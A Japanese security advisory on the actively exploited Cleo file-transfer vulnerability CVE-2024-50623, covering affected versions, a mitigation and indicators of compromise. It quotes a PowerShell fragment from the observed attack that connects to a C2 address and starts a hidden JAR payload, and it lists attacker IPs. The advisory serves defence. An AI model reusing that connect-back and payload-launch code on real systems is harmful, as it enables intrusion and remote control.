ファイル転送ソフトのCleoで重大な脆弱性が悪用される(CVE-2024-50623)
セキュリティ企業のHuntress Labsはファイル転送ソフトのCleo の Harmony、VLTrader、LexiCom ソフトウェアで重大な脆弱性 (CVE-2024-50623) が悪用されていると注意喚起しました。
目次
脆弱性の対象バージョン
- Cleo Harmony® (バージョン 5.8.0.21 未満)
- Cleo VLTrader® (バージョン 5.8.0.21 未満)
- Cleo LexiCom® (バージョン 5.8.0.21 未満)
パッチはリリース済みでバージョン 5.8.0.21以上
なお上記のパッチ を適用しても悪用される可能性がありますのでHuntress Labsは Cleoをファイアウォールの背後に移動することを強く勧めています。
緩和策
パッチを当てたバージョン 5.8.0.21 は、実際に発生しているエクスプロイトに対しては不十分です。Huntress LabsがCleoと会話したところ、できるだけ早く新しいパッチを提供すると述べています。
当面は、攻撃対象領域を制限するための緩和策を提案しました。この攻撃パスの後半は自動実行ディレクトリ経由のコード実行に依存していることから、
以下の手順の通りCleo を再構成してこの機能を無効にすることは可能です。ただし、パッチがリリースされるまでは、任意のファイル書き込みの脆弱性を防ぐことはできません。
- LexiCom、Harmony、またはVLTraderの「設定」メニューに移動します
- 「オプション」を選択
- 「その他」パネルに移動します
- 「自動実行ディレクトリ」フィールドの内容を削除します
パッチリリースバージョン
サイバー攻撃者は Cleo の自動実行ディレクトリに悪意のあるファイルを埋め込み、ソフトウェアはそれを自動的に処理して実行後に削除します。
このメカニズムにより PowerShell コマンドの実行が容易になり、攻撃者は Webshell のような永続性を持つ JAR ファイルなどの追加のペイロードを取得できるようになります。
攻撃兆候
以下のログがHuntressの観察から確認されています
自動実行ファイルの処理ログ
<Event>
<Detail level="0">Note: Processing autorun file 'autorun\healthchecktemplate.txt'.</Detail>
<Mark date="2024/12/07 05:56:55" EN="18734"></Mark>
</Event>
PowerShellコマンドの使用
$c=New-Object Net.Sockets.TcpClient("176.123.5.126", 443)
$s=$c.GetStream()
Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe -ArgumentList "-jar $f"
攻撃者がCleoソフトウェアを使用してローカルファイルをインポートし、悪用後のログの記録
<Event>
<Detail level="0">Note: Importing 'hosts\main.xml' (4.533 kBytes)...</Detail>
<Mark date="2024/12/07 05:56:56" EN="18737"></Mark>
</Event>
この攻撃には、Active Directory 列挙用の nltest.exe などの偵察ツールも組み込まれており、コマンド アンド コントロール (C2) を維持するために 176.123.5.126 や 5.149.249.226 などの外部 IP が使用されます。
攻撃に使用されたIPアドレス
- 観測されたC2サーバーのIPアドレス:
- 176.123.5.126(モルドバ)
- 5.149.249.226(オランダ)
- 185.181.230.103(モルドバ)
- 209.127.12.38(カナダ)
- 181.214.147.164(リトアニア)
- 192.119.99.42(米国)
これらのIPはCleoシステムに接続して攻撃を行い、継続的な通信を確立するために使用されています。